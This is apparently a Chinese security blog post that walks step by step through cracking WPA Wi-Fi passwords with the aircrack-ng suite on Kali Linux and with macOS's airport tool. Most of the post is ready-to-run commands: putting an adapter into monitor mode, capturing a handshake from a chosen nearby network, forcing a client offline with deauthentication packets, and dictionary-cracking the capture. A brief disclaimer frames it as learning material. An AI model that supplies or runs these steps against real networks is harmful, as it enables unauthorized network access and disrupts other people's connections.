微信公众号:乌鸦安全

扫取二维码获取更多信息!

声明
本文只是提供一个思路,目的是为了提升学习渗透的兴趣,禁止用于非法操作,否则后果自负 !!!
当然现在已经2021年了,谁还破WiFi,但是为了近源渗透,所以在这又来老生常谈了一次,这里使用了Kali和外置网卡以及mac破解Wi-Fi的方法。
视频教程链接地址:
https://space.bilibili.com/2990312201 外置网卡版
1.准备工作
首先你得有一个外置网卡,然后用虚拟机进行破解
所需要的设备:kali linux 外置网卡
要将虚拟机设置为:桥接模式

将插入的外接网卡设置为:

ifconfig看下:

2.开始攻击
将wlan0网卡开启混杂模式
airmon-ng start wlan0
#提示要杀掉一些进程,根据提示进行即可
airmon-ng check kill
airmon-ng start wlan0
开始抓包:
首先,查看附近WiFi热点,使用命令
airodump-ng wlan0mon
选取其中信号较好的WiFi热点,在这里我们选取一个目标(A4-306 2.4G)
使用airodump-ng对选取的WiFi热点进行cap监听与获取:
airodump-ng -c 6 --bssid 88:25:93:60:C0:D9 -w A4-3062.4G wlan0mon(保存文件名称)
-c 通道值 WiFi热点所对应的CH值(上图中可看到)
--bssid 需要破解WiFi的MAC值
-w cap文件名 wlan0mon 启用混杂模式的网卡名这个时候看到有12个设备进行了连接,选取一个为75-D7的进行抓包:(需要一直开启)

使用aireplay-ng 对选取的WiFi热点进行cap监听与获取:(再启动一个命令行)
aireplay-ng -0 2 -c E8:4E:06:21:75:D7 -a 88:25:93:60:C0:D9 wlanmon
-0 death模式
2为发送次数
-c 你所选择要断网操作的客户机MAC
-a WiFi热点MAC
有时候一次抓不到,多试几次,我试了三次之后,抓到了:

这个时候监听就可以停止了。
3. 跑包
我们直接使用kali自带的,在文件目录中,需要解压(这里不做演示)
#首先ls查看当前目录所产生的握手包 aircrack-ng -w rockyou.txt A4-3062.4G-02.cap-w代表字典 接着你的包名称
然后就等结果吧!(其实如果wifi密码复杂的话,基本上很难跑出来)

这个只是一个笔记,现在暴力破解的太难了,wifi密码稍微一复杂,基本就无望。
4. 2019年11月更新
现在使用kali自带的aircrack好像已经过时了,我在网上看到有更好、能跑GPU的工具了,具体的名字忘了,大家可以自行搜索,另外很多人再问我的无线网卡的型号,我的记得就30左右,不用买太好的,一般的就行:

最重要的还是字典问题,当然还有一种破解的方法是对pin包检测,但是那种方法只适合更老的路由器设备,现在的路由器基本上都可以防pin了,所以在这里就不再演示了。
02 macos版本方案
mac自带了airport工具
2.1 使用ariport
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
2.2 发现附近Wi-Fi
airport -s

2.3 侦听数据
airport en0 sniff 1 # 1代表信道此时Wi-Fi图标发现改变

一段时间后手动结束侦听,这里是为了抓到握手包

2.4 分析流量
aircrack-ng airportSniffkZzYWr.cap
其中可以看到 4-401已经抓到了握手包
2.5 aircrack破解
aircrack-ng -w dict.txt -b c0:61:18:11:d9:dc /tmp/airportSniffLbhZSp.cap

参考链接:https://blog.csdn.net/qq_39498701/article/details/104262468微信公众号:乌鸦安全

扫取二维码获取更多信息!